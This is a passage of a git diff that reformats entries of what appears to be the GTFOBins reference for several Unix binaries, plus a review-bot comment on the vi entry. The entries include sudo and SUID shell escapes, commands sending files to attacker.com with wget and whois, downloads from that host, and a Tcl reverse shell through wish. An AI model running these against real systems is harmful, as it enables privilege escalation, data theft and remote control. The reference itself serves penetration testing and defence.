+ - code: 'vi file_to_read
+
+'
+ suid-enabled:
+ - code: "./vi -c ':!/bin/sh -p'"
+ sudo-enabled:
+ - code: sudo vi -c ':!/bin/sh'
---
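Review bot: In the `file-write` entry the second line `w` is a normal-mode motion in vi (move forward one word), not a write; the ex command that writes the buffer is `:w`, so the listing as written never writes the file. Change the second line to `:w` (or `:wq` if the session should also exit). Also, the `file-read` value was re-serialized as `'vi file_to_read` + blank line + `'`, a single-quoted scalar whose embedded blank line stands in for the original `|` block's trailing newline; it parses to the same string, but `code: |` is clearer and consistent with the entry just above it.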
diff --git a/_gtfobins/watch.md b/_gtfobins/watch.md
index ef24de0..dc8fd22 100644
--- a/_gtfobins/watch.md
+++ b/_gtfobins/watch.md
@@ -1,12 +1,12 @@
---
functions:
execute-non-interactive:
- - code: watch /usr/bin/id
- sudo-enabled:
- - code: sudo watch /usr/bin/id
+ - code: watch /usr/bin/id
suid-enabled:
- - description: This keeps the SUID privileges only if the `-x` option is present.
- code: ./watch -x /usr/bin/id
+ - description: This keeps the SUID privileges only if the `-x` option is present.
+ code: "./watch -x /usr/bin/id"
+ sudo-enabled:
+ - code: sudo watch /usr/bin/id
suid-limited:
- - code: ./watch /usr/bin/id
+ - code: "./watch /usr/bin/id"
---
diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md
index 1c141e6..16ccf00 100644
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@@ -1,15 +1,16 @@
---
functions:
upload:
- - description: Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
+ - description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
+ Run an HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- wget $URL -O $LFILE
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ wget $URL -O $LFILE
---
diff --git a/_gtfobins/whois.md b/_gtfobins/whois.md
index f0e0d21..71bffd9 100644
--- a/_gtfobins/whois.md
+++ b/_gtfobins/whois.md
@@ -1,31 +1,37 @@
---
-description: |
- `whois` hangs waiting for the remote peer to close the socket.
+description: "`whois` hangs waiting for the remote peer to close the socket.\n"
functions:
upload:
- - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- whois -h $RHOST -p $RPORT "`cat $LFILE`"
- - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- whois -h $RHOST -p $RPORT "`base64 $LFILE`"
+ - description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'`
+ and its length is limited by the maximum size of arguments.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ whois -h $RHOST -p $RPORT "`cat $LFILE`"
+ - description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d'
+ | base64 -d > "file_to_save"` on the attacker box to collect the file. The file
+ length is limited by the maximum size of arguments.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ whois -h $RHOST -p $RPORT "`base64 $LFILE`"
download:
- - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file. The file has instances of `$'\x0d'` stripped.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_save
- whois -h $RHOST -p $RPORT > "$LFILE"
- - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_save
- whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
+ - description: Fetch remote text file from a remote TCP port. Run `nc -l -p 12345
+ < "file_to_send"` on the attacker box to send the file. The file has instances
+ of `$'\x0d'` stripped.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_save
+ whois -h $RHOST -p $RPORT > "$LFILE"
+ - description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send"
+ | nc -l -p 12345` on the attacker box to send the file.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_save
+ whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
---
diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md
index a65439e..e495e28 100644
--- a/_gtfobins/wish.md
+++ b/_gtfobins/wish.md
@@ -1,17 +1,17 @@
---
functions:
execute-interactive:
- - code: |
- wish
- exec /bin/sh <@stdin >@stdout 2>@stderr
- sudo-enabled:
- - code: |
- sudo wish
- exec /bin/sh <@stdin >@stdout 2>@stderr
+ - code: |
+ wish
+ exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
+ sudo-enabled:
+ - code: |
+ sudo wish
+ exec /bin/sh <@stdin >@stdout 2>@stderr
---
diff --git a/_gtfobins/xargs.md b/_gtfobins/xargs.md
index 5945187..a38ac2e 100644
--- a/_gtfobins/xargs.md
+++ b/_gtfobins/xargs.md
@@ -1,14 +1,16 @@
---
functions:
execute-non-interactive:
- - code: xargs -a /dev/null /usr/bin/id
- sudo-enabled:
- - code: sudo xargs -a /dev/null /usr/bin/id
- suid-enabled:
- - code: ./xargs -a /dev/null /usr/bin/id
+ - code: xargs -a /dev/null /usr/bin/id
file-read:
- - description: This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only.
- code: |
- LFILE=file_to_read
- xargs -a "$LFILE" -0
+ - description: This works as long as the file does not contain the NUL character,
+ also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed.
+ GNU version only.
+ code: |
+ LFILE=file_to_read
+ xargs -a "$LFILE" -0
+ suid-enabled:
+ - code: "./xargs -a /dev/null /usr/bin/id"
+ sudo-enabled:
+ - code: sudo xargs -a /dev/null /usr/bin/id
---
diff --git a/_gtfobins/xxd.md b/_gtfobins/xxd.md
index c64b879..7d854bb 100644
--- a/_gtfobins/xxd.md
+++ b/_gtfobins/xxd.md
@@ -1,19 +1,19 @@
---
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo xxd "$LFILE" | xxd -r
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./xxd "$LFILE" | xxd -r
- file-read:
- - code: |
- LFILE=file_to_read
- xxd "$LFILE" | xxd -r
file-write:
- - code: |
- LFILE=file_to_write
- echo data | xxd | xxd -r - "$LFILE"
+ - code: |
+ LFILE=file_to_write
+ echo data | xxd | xxd -r - "$LFILE"
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ xxd "$LFILE" | xxd -r
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./xxd "$LFILE" | xxd -r
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo xxd "$LFILE" | xxd -r
---
diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md
index 1db7501..4e73feb 100644
--- a/_gtfobins/zsh.md
+++ b/_gtfobins/zsh.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: zsh
- sudo-enabled:
- - code: sudo zsh
+ - code: zsh
suid-enabled:
- - code: ./zsh
+ - code: "./zsh"
+ sudo-enabled:
+ - code: sudo zsh
---